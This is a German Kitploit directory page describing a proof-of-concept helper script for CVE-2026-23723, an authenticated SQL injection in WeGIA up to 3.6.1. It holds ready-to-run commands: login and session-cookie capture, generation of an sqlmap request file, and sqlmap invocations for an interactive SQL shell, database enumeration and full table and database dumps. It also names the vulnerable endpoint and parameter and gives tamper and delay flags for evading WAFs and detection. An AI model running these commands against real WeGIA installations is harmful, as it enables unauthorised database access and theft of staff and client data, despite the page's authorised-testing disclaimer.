Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23723-POC — Dies ist ein leichtgewichtiges Python-Hilfsskript, das entwickelt wurde, um die Erstellung von sqlmap-kompatiblen PoC-Dateien für die authentifizierte, fehlerbasierte SQL-Injection-Schwachstelle in WeGIA (≤ 3.6.1) zu automatisieren, die als GHSA-xfmp-2hf9-gfjp identifiziert wurde. | Kitploit
Tools/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

Repository anzeigen
31vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dies ist ein leichtgewichtiges Python-Hilfsskript, das entwickelt wurde, um die Erstellung von sqlmap-kompatiblen PoC-Dateien für die authentifizierte, fehlerbasierte SQL-Injection-Schwachstelle in WeGIA (≤ 3.6.1) zu automatisieren, die als GHSA-xfmp-2hf9-gfjp identifiziert wurde.

Teilen

CVE-2026-23723 PoC – WeGIA Authentifizierte SQL-Injection Exploit-Hilfsprogramm

Authentifizierte Error-basierte SQL-Injection in WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Offizielles Advisory

Ursprünglicher Autor / Melder des PoC: ViniCastro2001 GHSA veröffentlicht von: nilsonLazarin (Projektbetreuer)

Dieses leichtgewichtige Python-Skript automatisiert:

  • Anmeldung am WeGIA-System mit bereitgestellten Zugangsdaten
  • Extraktion eines gültigen PHP-Session-Cookies
  • Erzeugung einer sqlmap-kompatiblen Request-Datei (Injektionspunkt als id_memorando=1* markiert)
  • Ausgabe von sofort einsatzbereiten sqlmap-Befehlen für Enumeration, interaktive Shell und Datenbank-Dump

Funktionen

  • Testet mehrere gängige Login-Pfade und Formularfeldnamen für bessere Kompatibilität
  • Erzeugt eine sqlmap-Request-Datei (.req)
  • Stellt Copy-Paste-sqlmap-Befehle bereit für:
    • Interaktive MySQL-ähnliche Shell (--sql-shell)
    • Datenbank-/Tabellen-Enumeration
    • Gezielten Tabellen-Dump oder vollständigen Datenbank-Dump

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek (in den meisten Penetration-Testing-Umgebungen bereits vorhanden)
  • sqlmap installiert und im PATH

Installation

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

Verwendung

root@kitploit:~
# Empfohlen: interaktive Passwortabfrage
python CVE-2026-23723.py --url http://target.com -u admin

# Passwort direkt angeben
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# Benutzerdefinierte Ausgabedatei
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

Nach erfolgreicher Ausführung führt das Skript Folgendes aus:

Anmeldeversuch Erzeugt wegia_sqlmap.req (oder Ihren benutzerdefinierten Dateinamen) Zeigt sofort verwendbare sqlmap-Befehle an

Beispiel für generierte Befehle:

root@kitploit:~
# 1. Interaktive MySQL-ähnliche Shell (am meisten empfohlen)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. Aktuelle und alle Datenbanken anzeigen
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. Tabellen in der wegia-Datenbank auflisten
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. Bestimmte Tabelle dumpen (Beispiel: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. Gesamte wegia-Datenbank dumpen (Vorsicht!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Optionale sqlmap-Flags:

--proxy=http://127.0.0.1:8080 (über Burp/ZAP)
--tamper=space2comment,randomcase (grundlegende WAF-Umgehung)
--delay=1 (verlangsamen, um Erkennung zu vermeiden)

Wenn die automatische Anmeldung fehlschlägt Manuell über den Browser anmelden → vollständigen Cookie-Header kopieren → sqlmap direkt ausführen:

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

Rechtlicher Hinweis Dieses PoC dient ausschließlich Bildungs- und autorisierten Penetrationstest-Zwecken. Die unbefugte Verwendung gegen ein beliebiges System ist illegal und verboten. Der Autor und die Mitwirkenden übernehmen keine Verantwortung für Missbrauch oder verursachte Schäden. Referenzen

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

Tool herunterladen